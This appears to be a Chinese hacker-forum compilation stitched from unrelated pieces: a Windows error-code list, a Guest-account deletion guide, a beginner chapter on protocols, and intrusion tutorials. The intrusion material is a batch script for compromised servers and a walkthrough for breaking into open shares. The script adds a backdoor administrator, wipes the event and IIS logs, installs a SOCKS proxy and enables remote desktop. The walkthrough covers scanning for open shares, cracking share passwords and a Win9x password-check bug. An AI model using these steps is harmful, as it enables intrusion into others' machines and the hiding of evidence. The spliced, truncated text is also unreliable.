0x0001 不正确的函数
0x0002 系统找不到指定的文件
0x0003 系统找不到指定的路径
0x0004 系统无法打开文件
0x0005 拒绝存取
0x0006 无效的代码
0x0007 内存控制模块已损坏
0x0008 内存空间不足,无法处理这个指令
0x0009 内存控制模块地址无效
0x000a 环境不正确
0x000b 尝试载入一个格式错误的程序
0x000c 存取码错误
0x000d 资料错误
0x000e 内存空间不够,无法完成这项操作
0x000f 系统找不到制定的硬盘
0x0010 无法移除目录
0x0011 系统无法将文件移到其他的硬盘
0x0012 没有任何文件
0x0019 找不到指定的扇区或磁道
0x001a 指定的磁盘或磁片无法存取
0x001b 磁盘找不到要求的扇区
0x001c 打印机没有纸
0x001d 系统无法将资料写入制定的磁盘
0x001e 系统无法读取指定的装置
0x001f 连接到系统的某个装置没有作用
0x0021 文件的一部分被锁定
0x0024 开启的分享文件数量太多
0x0026 到达文件结尾
0x0027 磁盘已满
0x0036 网络繁忙
0x003b 网络发生意外的错误
0x0043 网络名称找不到
0x0050 文件已经存在
0x0052 无法建立目录或文件
0x0053 int24失败
0x006b 因为代用的磁盘尚未插入,所以程序已经停止
0x006c 磁盘正在使用中或被锁定
0x006f 文件名太长
0x0070 硬盘空间不足
0x007f 找不到指定的程序
0x045b 系统正在关机
0x045c 无法种植系统关机,因为没有关机的动作在进行中
0x046a 可用服务器储存空间不足,无法处理这项指令
0x047e 指定的程序需要新的Windows版本
0x047f 指定的程序不是Windows或MS-DOS程序
0x0480 指定的程序已经启动,无法再启动一次
0x0481 指定的程序是为旧版的Windows所写的
0x0482 执行此应用程序所需的程序库文件之一毁坏
0x0483 没有应用程序与此项操作的指定文件建立关联
0x0484 传送指令到应用程序发生错误
0x04b0 指定的装置名称无效
0x05a2 窗口不是子窗口
0x05aa 系统资源不足,无法完成所要求的服务
0x05ab 系统子还不足,无法完成所需要的服务
0x05ac 系统资源不足,无法完成所要求的服务
0x06b9 资源不足,无法完成操作
再通过这个没有密码的Guest账号来访问你的机器。要是能删掉Guest就好了、、、
说起来好像很容易,但其实你打算删的时候就会发现,Guest账号同Administrator账号一样,没办法删掉。
当然,这并非不可能,下面就是方法:
一、在NT4.0环境里删掉Guest账号
很容易了,因为已经有现成的工具被人写出来了。
DelGuest下载,官方网站 http://www.ntsecurity.nu/toolbox/delguest/
很久以前 NT4.0的时候,我就用过这个工具了,虽说微软并不赞同这个做法,呵呵
但,从我了解的资料看,的确并没有影响到系统原本的正常运行。
二、在Windows2K环境里删掉Guest账号
没有现成的工具,也可能是我还没找到吧。呵呵
一些线索:Windows系统的账号信息,是存放在HKEY_LOCAL_MACHINE\SAM里的,但是
直接打开注册表想去修改却并不能打开它,哪怕你是管理员权限都不行。
因为为了安全性考虑,必须由“SYSTEM”权限才能访问。
所以整理一下,大致思路是这样的:
以“SYSTEM”权限启动注册表,然后检查注册表项,把账号Guest删掉。
首先,我们以AT来添加一个计划任务,看了一下时间 13:51,OK,设定一分钟后运行。
使用AT,目的是以“SYSTEM”权限运行。
/interactive,目的是让运行的程序以交互式界面的方式运行。
趁程序还在等待调度,我们先看看Guest账号的资料
呵呵,想想待会它就没了,还是很爽的
ok,13:52了,regedt32程序运行了
打开注册表程序
把 HKEY_LOCAL_MACHINE\SAM\Domains\Account\Users下的两个相关键删掉。
一个是000001F5,一个是Names下的Guest
呵呵,怎么删不用我讲了吧
然后呢,我们再检查一下,账号
net user guest
不见了吧
好的,就到这里。
另,如果是win2k域模式下,推荐不要删掉Guest账号,我没有测试过,不知道会不会出现什么问题。
未经同意而又不是中国安全网的核心或者斑竹请勿转载,否者后果自负
收集编辑:Eternal(陈小风) 中国安全网:http://www.chinasafe.net/
我的名字叫陈小风今年都有18岁了,爱好是上网.游泳.聊天。在中专读网络工程和电子商务,第3个学期刚结束,学校就要我们去实习,自己找工作做了,这段时间我为大家收集和整理编写了一些菜鸟技术知识让大家看看,教程一共是12章,教程名字叫菜鸟菜记之安全与黑客纵览(这些文章是我接触黑客到现在自己总结的.书上看到的.网络找到文章而整理回来的),以后会慢慢推出。因本人以前语文没学好水平太差劲所以语文表达能力差请大家别见怪,进入正题把,LOOK:
第一章初级了解系统.BUG.协议
No.1 Win一族的产品系列简介
在1983年春季就宣布开始研究开发Windows
Win3.x
Microsoft于1990年5月份推出Windows3.0,这是个人操作系统的产品。操作命令图形化系统,使用起来容易简单,但是由于技术和设计等各方面上的不成熟,Win3.X当时并未在个人操作系统领域里可以“一统江湖”。
Win95
于1995年8月推出新一代操作系统Windows95(又名Chicago),这是Win家族系列的又一产品,虽然Win95功能不健全,经常当机(死机),安全隐患更加数不尽数,但是,微软正是靠Win95才可以垄断了个人操作系统平台的市场。所以Win95应该也可以说是微软的骄傲。
Win97-98-ME
98年【9月1日】Windows98中文版全国首发,凌晨0:00-1:38华特连邦举办了“午夜疯狂”首发活动
这些只能说是Win95的升级版,只是在功能和安全方面做了很多弥补系统程式BUG(漏洞)而已。 98:游戏系统平台,一般我们这些年纪的人都知道他的存在,大家都爱玩游戏嘛,但是说到Hacker(黑客)这方面就简直谈不上了.ME:这个系统比起98来可以说功能和界面都要好多了,但是ME(我)还是个人系统也谈不上什么网络服务器,那怎么学习入侵呢,下面请看。
WinNT/2000
微软(中国)有限公司今天宣布,业界期待已久的其面向新世纪的划时代产品Windows 2000中文版在I T界的广泛支持下,于2000年3月20日在中国隆重上市
一般这两种操作系统多数用在网络来做服务器使用,公司或者网吧类的大部分都是使用这些系统。NT在局域网领域中是比较受欢迎的,在网络中因为NT安全性不佳正慢慢的被Win2000所替代。我也是用2K(WIN2000),2K因为对硬件配置要求较高,学生或者不太富裕的学习者们一般都没这么多金钱配置的,因此市场普及还须要一段时间,不过到了现在IT业的迅速发展,昨天帮人装电脑已经说出到P42.6G了,不知道有没有记错,我对硬件没什么去了解和认识,主流电脑的价格一般在于5千到6千之间了,所以大多数人也开始装起P4用起2K来了,NT倒听少人用了,不过还有很多公司用着呢。
WinXP
2001年11月9日在北京举办的的Windows XP首发活动
WINXP虽说微软声称这是个人操作系统领域里的第二次改革产品,但是我个人总的感觉来说XP 没有2K这么好用,虽然他的功能比2K强大多了,但是我还是不喜欢用XP,或许等以后XP更加的成熟可靠,我也是要跟着IT业的迅速发展而改使用XP的。XP的占硬盘总容量居然达到1.2G,据说程序代码就有4000万行之多,晕,好雄伟的创举啊。并且声称“永不死机”。和我英文名Eternal有点相似啊,我的英文名的意思是永恒,他是永不啊。是不是真的永不死机呢?当然,你用了就了解了。还有一点,说说装XP系统PC配置的要求,P3 1G以上,最好就P4拉,不然你体会不到XP的爽只能体会到XP的慢啊,^ō^
第2小节
NO.1.2 Windows BUG(漏洞)简介
NO.1.2.1 什么是Windows BUG
系统的BUG也称安全缺陷.安全隐患,这些安全隐患会被技术菜与不菜的Hacker(入侵者)所利用,从而达到控制目标主机或造成一些偷窃秘密.做间谍.或更具破坏性的目的。
NO.1.2.2 为什么会存在BUG
BUG的产生大致可分为两种类:
第1类:一些程式员在编写程序过程中,因程式员为了达到些不可告人的目的或是商业意图,有意无意的在程序的隐蔽处留下各种各样的后门,供日后自己使用,随着社会的不断变化,法律也不断的完善,这类漏洞将越来越少(但是还有些有意者留下的,而我们就可以利用这些达到入侵目的)。
第2类:由于一些程式员的水平.经验问题和当时安全与加密技术方法运用的不当,或者简直不会。在程序中总会多多少少有些不足的地方没别发现,这些地方有的影响程序的运行效率,有的会导致非授权用户的权利提升(也就是我们从普通的用户提升到ADMIN权限用户),安全与不安全从来都是敌对的。所以网络系统和某些程式都有很多BUG让我们去利用,而安全的呢,就可以让我们去补救。
第3小节
1.3 Win核心的常用网络协议
在网络中不同样的工作站,或者服务器之间能传输数据.文件.程式等等很多很多,就是因为有网络协议的存在。随着网络的迅速发展,不同的开发商.公司.集团,都开发了不同的通信方式。为了使通信成功.可靠.稳定,网络中的所有主机都必须使用同一语言,不能带有方言另语。因而必须开发出严格标准的定义主机与主机之间的每个信息包中每个字节中的每一位。这些严格标准来自于多个庞大组织的努力,约定好通用的通信方式:即协议。
现今网络界已经开发出了许多协议,但是只有极其少数被保留了下来(那些就是精英中的精英)。那些协议被淘汰有多种原因:设计不好、实现不好或缺乏多样的支持。而那些被保留下来的协议,因经历了时间.技术.性能的考验,然而成为了今世今日有效的通信联系方法。当今局域网中最常见的三个协议是Micrsoft的NetBEUI,NOVELL的IPX/SPX,和交叉平台TCP/IP协议(这个TCP/IP协议相信很多学习者都听的最多的)。
1.TCP/IP协议
每种网络协议都有自己的优点和缺点,但是只有TCP/IP协议才允许与Internet完全的连接。TCP/IP协议是在60年代由麻省理工学院和一些商业组织机构为美国国防部开发的,即使遭到核武器的攻击而破坏了大部分网络,但是TCP/IP协议仍然能够维持有效的通信联系。ARPANet就是基于协议开发的,并发展成为作为科学家和工程师和更多人们需要交流媒体的Internet。
Internet大众化以后,人们开始发现全球网络的强大功能和重要性。Internet的普遍性是TCP/IP协议至今仍然使用的原因。常常在没有意识到的情况下,用户就在自己的PC上的系统平台安装了TCP/IP协议,从而使该网络协议在全球应用更广。
(1)TCP/IP协议整体构架
传统的OSI(开放式系统互连)参考模型,是一种通信协议,7层抽象的参考模型
其中每一层执行某一个特定任务。该模型的目的是使各种硬件在相同的层次上相互通信联系。
OSI分为七层,其名字和功能分别如下:
◢ 物理层(Physical Layer):主要功能为定义了网络的物理结构,传输的电磁标准,Bit流的编码及网络的时间原则,如分时复用及分频复用。决定了网络连接类型(端到端或多端连接)及物理拓扑结构。说的俗一些,这一层主要就是负责实际的信号传输。
◢ 数据链路层(Data Link eview):在两个主机上建立数据链路连接,向物理层传输数据信号,并对信号进行处理使之无差错并合理的传输
◢ 网络层(Network Layer):主要负责路由,选择合适的路径,进行阻塞控制等等......功能。
◢ 传输层(Transfer Layer):最关键的一层,向用户提供可靠的端到端(End-to-End)服务,它屏蔽了下层的数据通信细节,让用户及应用程序不需要考虑实际的通信方法。
◢ 会话层(Session Layer):主要负责两个会话进程之间的通信,即两个会话层实体之间的信息交换,管理数据的交换。
◢ 表示层(Presentation Layer):处理通信信号的表示方法,进行不同的格式之间的翻译,并负责数据的加密解密,数据的压缩与恢复
◢ 应用层(Application Layer):保持应用程序之间建立连接所需要的数据记录,为用户服务。
而TCP/IP协议并不完全符合OSI的七层抽象的参考模型,它采用了只有4层结构,每一层都呼叫它的下一层所提供的网络来完成自己的需求。
这4层分别是:
◆应用层:应用程序间沟通的一层,如简单电子邮件传输协议(SMTP).文件传输协议{(FTP)这个如果让我们得到最高FTP权限,就可以直接改对方的主页面了,很重要的入侵途径}.网络远程访问协议{(Telnet)如果登陆上它,那么你可以当自己的CMD一样用命令控制使用那台机子了,哈哈}等等......;
◆传输层:此层提供了节点间的数据传送服务,如传输控制协议(TCP).用户数据报协议{(UDP)我们经常用的OICQ就是用这个UDP协议拉,所以大家要记住啊,不然别人问起你的QQ是用什么协议进行通信的,你居然不知道,还说玩了多久QQ或者有个多少位好号码的QQ呢}等等......,TCP和UDP给数据包加入传输数据并把它传输到下一层中,这一层负责传送数据,并且确定数据已被送到达并接收;
◆网络层:负责提供基本的数据封包传送功能,让每一块数据包都能到达目的主机(但不会检查确认是否被正确的接收),如网际协议(IP)...... ;
◆网络接口层:对实际的网络媒体管理,定义如何使用实际网络(如Ethernet、Serial Line等......)来传送数据。
(2)TCP/IP协议中的功能
◆IP协议
网际协议IP是TCP/IP的心脏.核心,也是网络层中最为重要的协议。
IP层接收由更低层(网络接口层,例如LAN(以太网)设备驱动程序)发来的数据包,并把该数据包发送到更高层--TCP或UDP层;相反,IP层也把从TCP或UDP层接收来的数据包传送到更低层。IP数据包是不可靠的,因为IP并没有做任何事情来确认数据包是按顺序发送的或者没有被破坏过的。IP数据包中含有发送它的主机的地址(源地址)和接收它的主机的地址(目的地址)。
高层的TCP和UDP服务在接收数据包时,通常假设包中的源地址是有效的。也可以这样说,IP地址形成了许多服务的认证基础,这些服务相信数据包是从一个有效的主机发送来的。IP确认包含一个选项,叫作IP Source Routing,可以用来指定一条源地址和目的地址之间的直接路径。对于一些TCP和UDP的服务来说,使用了该选项的IP包好象是从路径上的最后一个系统传递过来的,而不是来自于它的真实地点。这个选项是为了测试而存在的,说明了它可以被用来欺骗系统,然后可以进行平常是被禁止的连接。那么,许多依靠IP源地址做确认的服务将产生问题并且会被利用到非法的入侵。
◆TCP协议
如果IP数据包中有已经封好了的TCP数据包,那么IP将把它们传送到TCP层。TCP将包排序并进行错误检查,同时实现虚电路间的连接。TCP数据包中包括序号和确认,所以未按照顺序收到的包可以被排序,而损坏的包可以被重新传输。TCP将它的信息送到更高层的应用程序中,例如Telnet的服务程序和客户程序。应用程序轮流将信息送回TCP层,TCP层便将它们向下传送到IP层.设备驱动程序和物理介质.最后到接收方。
面向连接的服务(例如Telnet、FTP、Rlogin、Xwindows和SMTP)需要高度的可靠性,所以它们使用了TCP.DNS(全称是Domain Name System为了方便为我们在文字和IP之间担当了翻译而免除了强记号码的痛苦,当您连上一个网址在URL打上 http://www.chinasafe.net 这样不就更容易记住吗,要打一连4组的IP数字会记晕啊)在某些情况下使用TCP(发送和接收域名数据库),但使用UDP传送有关单个主机的信息。
◆UDP协议
UDP与TCP位于同一层,但不提供任何顺序或重新排序功能,因此,UDP不被应用于那些使用虚电路的面向连接服务,UDP主要用于那些面向查询——应答的服务,例如NFS。欺骗UDP包比欺骗TCP包更容易更简单,因为UDP没有建立初始化连接(也就是称为握手,因为在两个系统间没有虚电路),也就是说,与UDP相关的服务面临着更大的危险。所以QQ就是这样经常有偷QQ.破QQ.QQ补丁这些软件程式的出现。
协议 优点 缺点
TCP 传送稳定资料传送成功率高。 速度比较慢。
UDP 传输量大迅速。 不稳定容易遗失资料
◆ICMP(Internet Control Message Protocol)协议
ICMP与IP位于同一层,它被用来传送IP的的控制信息。它主要是用来提供有关通向目的地址的路径信息。ICMP的“Redirect”信息通知主机通向其他系统的更准确路径,而“Unreachable”信息则指出路径有问题。另外,如果路径不可用了,ICMP可以使TCP连接“体面的”终止。Ping(可以P出对方域名的IP)是最常用的基于ICMP服务。tracert 和 traceroute 也是属於 ICMP的。不知道什么时候 有人告诉我,ICMP用来制作攻击程式了,哈哈,想不到一种这么好的协议都用来做攻击软件的使用,IGMP就在很早都给菜鸟们用来丢数据包从而使得对方机子因网络数据堵塞,机子处理不过来,死机或者掉线,这个可是98的一个安全隐患啊,2K或者有宽带的都很难炸的到掉线了。世界真是瞬间万变啊 ^ō^
2.NetBEUI协议
NetBEUI是为IBM开发的非路由协议,用于携带NetBIOS(共享啊,看到这个协议就高兴啊,哈哈,比较简单的入侵是靠它进行的)通信。NetBEUI缺乏路由和网络层寻址功能,既是其最大的优点,也是其最大的缺点。因为它不需要附加的网络地址和网络层头尾,所以很快并很有效且适用于只有单个网络或整个环境桥接起来的小工作组环境。因为不支持路由,所以NetBEUI永远不会成为企业网络的主要协议。NetBEUI帧中唯一的地址是数据链路层媒体访问控制(MAC)地址,该地址标识了网卡但没有标识网络。路由器靠网络地址将帧转发到最终目的地,而NetBEUI帧完全缺乏该信息。网桥负责按照数据链路层地址在网络之间转发通信,但是有很多缺点。因为所有的广播通信都必须转发到每个网络中,所以网桥的扩展性不好。NetBEUI特别包括了广播通信的记数并依赖它解决命名冲突。一般而言,桥接NetBEUI网络很少超过100台主机。
近年来以依赖于第二层交换器的网络变得更为普遍了。完全转换环境,降低了网络的利用率,尽管广播仍然转发到网络中的每台主机。事实上,联合使用100-BASE-T Ethernet
允许转换NetBIOS网络扩展到350台主机,才能避免广播通信成为严重的问题。
3.IPX/SPX
IPX是NOVELL用于NetWare客户端/服务器的协议群组,避免了NetBEUI的脆弱点。但是,也带来了新的弱点。IPX具有完全的路由能力,可用于大型企业网。它包括32位网络地址,在单个环境中允许有许多路由网络,啊.挺强吧!!! IPX的可扩展性受到其高层广播通信和高开销的限制。服务广告协议(Service Advertising Protocol,SAP)将路由网络中的主机数限制为几千。尽管SAP的局限性已经被智能路由器和服务器配置所克服,但是,大规模IPX网络的管理员仍是非常困难的工作中啊。
从用户的角度LOOK,TCP/IP协议提供一些应用程序,主要包括:
1.远程登录协议(Telnet)
2.文件传输协议(Ftp)
3.电子邮件服务(Email)
4.Internet漫游服务(WWW服务)
5.简单邮件传输协议(SMTP)
6.信息服务(Gopher)
7.文件检索服务(Archie)
●远程登录协议(Telnet):用Telnet可以登录到远程服务器上并进行信息访问,可访问所有的数据库、联机游戏、对话服务以及电子公告牌,相当与被访问的计算机是自己的电脑,不过是要用全命令式的来操作。
●文件传输协议(Ftp):运用FTP可以从网上得到许多应用程序和信息。最初的FTP程序是工作在UNIX系统下的,以前的许多FTP程序是工作在Window95下的,现在就~~~~~~~~,哈哈,不用我多说把,FTP程序除了完成文件的传送之外,还允许用户建立与远程计算机的连接,登录到远程主机上,并可在远程主机上的目录间移动。(随意改动对方的文件哦,主要是对方的主页啊!!!)
●电子邮件服务(Email):电子邮件是Internet提供的使用最广泛的服务。通过电子邮件,可以与Internet上的任何人交换信息。电子邮件的快速、高效、方便以及价廉,使得越来越多的人热衷于这项服务。目前,全球平均每天约有上亿电子邮件在网上传输。不过最近这1.2年国内的电子邮件服务的站点因为要使用到庞大的资金,另站点耗费太大,所有都陆陆续续的开始进行Email收费了,不过还是有很多免费的,例如163.21CN,我都在用啊,哈哈
●Internet漫游服务(WWW服务):现在大家使用的最多应该是WWW服务,它同其它Internet程序的最大区别就是它的界面对我们有很大的吸引力,通过WWW服务,只要用鼠标单击一下,就可以到达世界上任何一个有网络,可以登陆Internet的地方。由于WWW服务使用的是超文本链接,所以可以很方便的从一个信息页转换到另一个信息页。它不仅能查看文字,还可以欣赏图片、音乐(MP3啊,已经流行很久了)、动画(最近这1年FLASH发展的更快更广了,差不多每个站点都有用FLASH制作的Bananer和LOGO。比较流行WWW服务的程序就是Tbrowser(QQ浏览器)和IE(WIN自带的浏览器啊)了。
●简单邮件传输协议(SMTP):SMTP是TCP/IP协议一族的一名成员,这种协议认为你的主机是永远连接在Internet上的,而且,认为你在网络上的主机是可以在任何时候都被访问的。所以,它适用于永远连接在Internet的主机(当然停电或者什么意外,那就要关机啊),但是无法使用通过SLIP/PPP连接的用户接收电子邮件。解决这个问题的办法是在邮件主机上同时运行SMTP和POP协议的程序,SMTP负责邮件的发送和在邮件主机上的分拣和存储,POP协议负责将邮件通过SLIP/PPP连接传送到用户的主机上。
●信息服务(Gopher):Gopher最早出现在1991年,它其实是第一个操作简便.使用广泛的从Internet服务器上获取信息的客户应用程序。除了操作简单外,它的另一个特点是速度快。Gopher运行时,将显示一个交互式的供用户选择的菜单,菜单中的选项由简单的短句组成,每个短句通常指向另一个菜单,并最终指向有用的文件。Gopher是帮助用户在Internet信息海洋中搜索有用信息的导航器。用户只要关心浏览的内容,而不必关心具体的服务器,所以没多少人知道或者了解这个服务,没去看协议的人一般都不会发现有这样的服务的存在。
● 文件检索服务(Archie):它是一种从整个Internet上匿名FTP服务器获取文件的服务。其完全依赖于匿名FTP系统的管理员,他们将站点对全世界的Archie服务器进行了注册。Archie仅通过文件名进行检索。这个服务也比较少见,都是默默的为Internet工作,最常见到的就是:远程登录协议(Telnet).文件传输协议(Ftp).电子邮件服务(Email).Internet漫游服务(WWW服务).简单邮件传输协议(SMTP)这些协议一定要记住啊,不然怎么学安全或者Hacker!!!
SNMP(Simple Network Management Protocol):简单网络管理协议
是一广泛使用的网管协议
帮助网管人员管理TCP/IP网络中各种装置
没有繁复的指令
概念上只有fetch-store(存-取)两种命令
其优点为简单
稳定及灵活.
IP地址的表示形式:
Internet和我们直接发生关系的既不是物理网,也不是网络协议,而是网络应用软件和应用程序。它们是我们使用网络时必须借助的基本工具,是我们与网络打交道.交互界面和入口。这些网络应用程序与在单个计算机上运行的单用户应用程序不同,它离开网络使用将没有意义。网络应用程序很多,如:Mail、telnet、ftp、archie、gopher、WAIS和WWW浏览器等。要上网,就必须了解Internet的地址和域名等基本常识。Internet的地址就像我们身边的街道号码.地址住所,用来标示网上计算机的“住址”。Internet实际上是一个大型的TCP/IP网络,在Internet上进行信息交换的基本要求就是网上的所有主机必须具有唯一的地址,就象日常生活中朋友之间相互通信需要写明通信地址一样。Internet地址分为两种形式:用数字表示的IP地址和用字母表示的域名地址。在Internet上为每台主机指定的地址称为IP地址。其是唯一的,具有固定.规范的格式。每个IP地址含32位,被分为4段,每段8位,段与段之间用句点分隔。为了便于表达和识别,IP地址是以十进制形式表示的,每段所能表示的十进制数最大不超过255。IP地址由两部分组成,即网络号(NetgworkID)和主机号(HostID)。网络号标识的是Internet上的一个子网,而主机号标识的是子网中的某台主机。网际地址分解成两个域后,带来了一个重要的优点:IP数据包从网际上的一个网络到达另一个网络时,选择路径可以基于网络而不是主机。在大型的网际中,这一优势特别明显,因为路由表中只存储网络信息而不是主机信息,这样可以大大简化路由表。IP地址根据网络号和主机号的数量而分为A、B、C三类:
A类IP地址:用7位来标识网络号,24位标识主机号,最前面一位为“0”,即A类地址的第一段取值介于1~126之间。A类地址通常为大型网络而提供,全世界总共只有126个只可能的A类网络,每个A类网络最多可以连接16777214台主机。
B类IP地址:用14位来标识网络号,16位标识主机号,前面两位是“10”。B类地址的第一段取值介于128~191之间,第一段和第二段合在一起表示网络号。B类地址适用于中等规模的网络,全世界大约有16000个B类网络,每个B类网络最多可以连接65534台主机。
C类IP地址:用21位来标识网络号,8位标识主机号,前面三位是“110”。C类地址的第一段取值介于192~223之间,第一段、第二段、第三段合在一起表示网络号。最后一段标识网络上的主机号。C类地址适用于校园网等小型网络,每个C类网络最多可以有254台主机。
所有的IP地址都由国际组织NIC(NetworkInformationCenter)负责统一分配,目前全世界共有三个这样的网络信息中心:
InterNIC:负责美国及其他地区;
ENIC:负责欧洲地区;
APNIC:负责亚太地区;
类型
IP地址
网络ID
宿主机ID
A
w.x.y.z
w
x.y
B
w.x.y.z
w.x
x.z
C
w.x.y.z
w.x.y
z
A类:高端位0,接下来7位表示网络ID,其余24位表示宿主机ID
B类:高端位10,接下来14位表示网络ID,其余16位表示宿主机ID
C类:高端位110,接下来的21位表示网络ID,其余8位表示宿主机ID
D类:高端位1110,在网络IP地址设置中不用
E类:高端位1111,实验地址在网络IP地址设置中不用
A类地址适合于网络较少而节点较多的情况,网络数为128,每一网络的节点数为1千6百万个。
B类地址适合于网络数和节点数适中的情况,网络数为16000个,每一网络的节点数为64000个。
C类地址适合于网络数较多而节点较少的情况,网络数为2百万个,每个网络的节点数为256个。
如何识别IP地址类别:根据IP地址的第一字节值业判数,
1-126(1.x.y.z-126.x.y.z) A类
128-191(128.x.y.z-191.x.y.z) B类
192-223(192.x.y.z-223.x.y.z) C类
网络地址分配准则
网络ID必须是唯一
127保留给诊数回送函数
网络ID的位不都置为1(十进制255)255用作广播地址
网络ID位不能都置为0,0表示局部网络
一些常出现在大家眼中的网络设备:
● 网卡:网卡是计算机与网络相连的接口电路。它的主要功能是:并行数据与串行数据的转化:网络信号的产生:数据包的装配和拆卸;数据的缓存及数据存取控制等
● 集线器(HUB)
它的作用主要是将信号再生转发,使用集线器可以改善网络的管理和维护,提高网络的稳定性和可靠性。集线器一般分为独立式.交换式.智能式.堆叠式和Switch HUB等几种。接口数是集线器的一个重要参数。它是指集线器所能连接的计算机数目。
● 中继器(Repeater)
主要作用是放大在传输介质上的传输信号,以便在网络上传输的更远。
● 网桥(Brige)
它主要用于连接使用相同通信协议.传输介质和寻址方式的网络。网桥可以连接不同类型的局域网,也可以将一个大网分成多个子网,均衡各网段的负荷,提高网络的性能。
● 路由器(Router)
其作用主要是连接局域网和广域网,它有判断网络地址和选者路径的功能。它的主要工作是为经过路由器的报文寻找一条最佳路径,并将数据传到目的站点。
● 网关(Gateway)
它用于不同的网络之间的连接,为网络提供协议转换,并将数据重新分组后传送。
在这章中让大家简略了解WIN系统.BUG.的一些知识,重点是协议。相信在以后的章程中可以让大家更好的学习。
未经同意而又不是中国安全网的核心或者斑竹请勿转载,否者后果自负
收集编辑:Eternal(陈小风) 中国安全网:http://www.chinasafe.net/
首先需要几个软件
第一个是snake写的socks5代理跳板,自己去找
第二个是小榕写的CleanIISLog,
开始操作:打开--开始--程序--附件--笔记本
写入:
-------------------------------------------------------------------------------
echo off
net user TsInternetUser 12345 <--TsInternetUser是win2k默认用户,我们更改密码
net localgroup administrators TsInternetUser /add
net use \\127.0.0.1\ipc$ "12345" /user:"TsInternetUser"
dellog.exe -s \\127.0.0.1 -l "application" -C
dellog.exe -s \\127.0.0.1 -l "system" -C
dellog.exe -s \\127.0.0.1 -l "security" -C
net stop w3svc
del c:\winnt\system32\logfiles\*.*/s /f /q
del d:\winnt\system32\logfiles\*.*/s /f /q
net START w3svc
sss -install
sss -config starttype 2
sss -config port 1080
net start skserver
echo [Components] > %systemroot%\sql
echo TSEnable = on >> %systemroot%\sql
sysocmgr /i:%systemroot%\inf\sysoc.inf /u:%systemroot%\sql /q
--------------------------------------------------------------------------------
写好后另存为,3389.bat文件,大家可以更换你想要的名字,但扩展名一定要是bat文件
然后将文件上传到主机上运行3389.bat ,必需同一个目录下运行bat文件,3分钟后你就可以连接3389了!还有SOCKS5代理
但不是每台主机都行!要确定是台win2000 server肉鸡!这样的成功率高达80%,本人测试10台server肉鸡后有7台能登陆3389,好东西当然要分享啦!
使许多初学者至今都没成功入侵过。
入侵前的准备:一台用modem上网的家庭电脑(保证自己有充分的支配权进行研究),操作系统最好是使用win98
再加一个可以显示IP的QQ
还要有一个搜索网络共享肉鸡的好软件,在这里推荐大家使用国产黑客软件“网络刺客II”。
共享入侵的流程:
1.检查一遍自己的网络设置是否符合入侵要求
有相当多的初学者不能成功入侵共享机器就是因为没有正确设置网络环境:因为win98默认安装时并没有安装“文件与共享服务”,所以不能进行共享访问。请先检查爱机有没有网络邻居,如果没有就依次进入“控制 面板”→“网络”,选中“Microsoft 网络用户”为主网络登录方式,然后点击“文件及打印共享”这一按键 ,再选中“允许其它用户访问我的文件”,最后按确定后按提示放入win98安装光盘进行补装。重启后你会发现你的桌面上多了个网络邻居,。接下来我们再依次点击“我的电脑”→“拨号网络”的“服务器类型”标签
选 中“登录网络”这一项并选上“NetBEUI"协议(因为“登录网络”很影响拨号速度,大部分人都早把它取消了, 这也是最易被忽略的共享设置)。经过这样的设置,我们就可以远程访问共享计算机了。 注:设置共享不需要网卡。
2.搜索Internet上的共享机器
再一次吐血推荐著名的国产黑客软件“网络刺客II”,推荐它的原因是它有着非常强大的搜索互联网上的共享主机的功能,并且容易上手(请支持国产软件!)。我们首先要有一些有效的IP地址作为搜索条件,现在我 们就打开先前已下载好的完美版QQ吧
在你的QQ好友里随便选个IP地址,然后打开“主机资源”→“搜索共享主 机”,输入IP的搜索范围,比如你获得的IP为888.888.888.888(乱写的),你只要在起始地址里输入 888.888.888.1,终止地址会自动填上888.888.888.255,最后按开始搜索,等上几分钟就会有一大把肉鸡的列 表显示出来了。(如果没有的话就换个IP搜索)
3.入侵方式
入侵方法有好几种,这里我推荐两种最简单的入侵方式:一种是直接在“开始”→“运行”里输入\\IP(这 个IP就是肉鸡的IP
注意“\\”不能少!)并回车,然后再过几十秒左右就会出现那台主机所有的共享目录,这 时你就可以进行访问了,如果你顺利访问C盘
就再试试能不能在里面创建一个文件,如果能的话,恭喜你!这是一台完全共享C盘的主机,对于这样的主机,我们可以用木马来完全获得它的控制权,其具体操作分两种情况 ,这方面在以下一节中详细讲解。还有一种方式是利用“网络刺客II”进入共享主机,方法也很简单,在列出 的共享主机列表中选中一台主机的共享目录,右击出现一菜单,点中“映射成网络硬盘”,过一会软件就会提 示映射成功,接下来就快进入“我的电脑”看看战果吧。随着入侵次数的增多,你可能会常遇到设有共享密码的目录,这种情况你就必须输对共享密码才能访问到共享目录。关于共享密码的破解方法,还是非常有必要了解的。由于本人水平有限,在这个方面只能提供两种方法,一种是通过软件进行暴力破解,这样的软件有很多
,“网络刺客II”本身就含有强大的破解功能
其具体操作就不讲了。还有一种破解方式是通过共享目录密码的 效验bug进行闪电破解。你只要对vredir.vxd修改(它存在漏洞,)
下面是文件VSERVER(以下代码分析是转贴的那位bug发现者的所写的资料):
VXD中密码校验过程调用的有BUG的一段程序。
3647是判断客户端密码是不是输入没密码,这时密码项内容是0X20,空格。
不是就转 LOC-0444。
365A判断客户端通过网络通信发过来的加密后密码长度是0X18吗,一般都是。这转LOC-0447去把共享目录密码加密同网络通信过来的密码比较,通过TEST EAX,EAX设置ZF标记判断密码对不对。如果密码长度不是0X18,可能是别的什么方式的密码比较,这儿密码是明码没加密。再判断密码长度大于9不,共享密码长度是1-8个字母数字等。下面就是比较密码,后面的循环是以ECX密码长度和ZF标记为结束条件。显然这儿应该有BUG,这密码长度ECX应该是本声密码的长度,而这儿密码长度是网络通信发过来的数据。所以我发过来的数据是1就只比较了一个密码的最前面字节。如果这一字节对就ZF=0因ECX=0退出结果是校验密码成功。
03647---- loc_0442:----; xref 03635
03647 66| 83 3A 20 cmp--word ptr [edx]
20h ;THE SHARE PASSWORD
0364B 75 0D jne--short loc_0444--; Jump if not equal
0364D B8 08460002----mov--eax
8460002h
03652 F9------stc----; Set carry flag
03653 C9-- --leave----; Procedure exit
03654 C3------retn
03655------loc_0443:----; xref 03640
3645
03655 80 3F 00----cmp--byte ptr [edi]
0
03658 74 26----je--short loc_0446; Jump if equal
0365A----loc_0444:------; xref 0364B
0365A 83 F9 18 cmp ecx
18h ; THIS HAS BUG FOUND BY YRG 1999.1.15
0365D 74 24 je--short loc_0447--; Jump if equal
0365F 83 F9 09-- cmp--ecx
9
03662 77 1C-- ja--short loc_0446--; Jump if above
03664 F5---- cmc----; Complement carry
03665 83 D9 00-- sbb--ecx
0
03668 51---- push--ecx
03669 53---- push--ebx
0366A 8B 1D 000137F4--mov--ebx
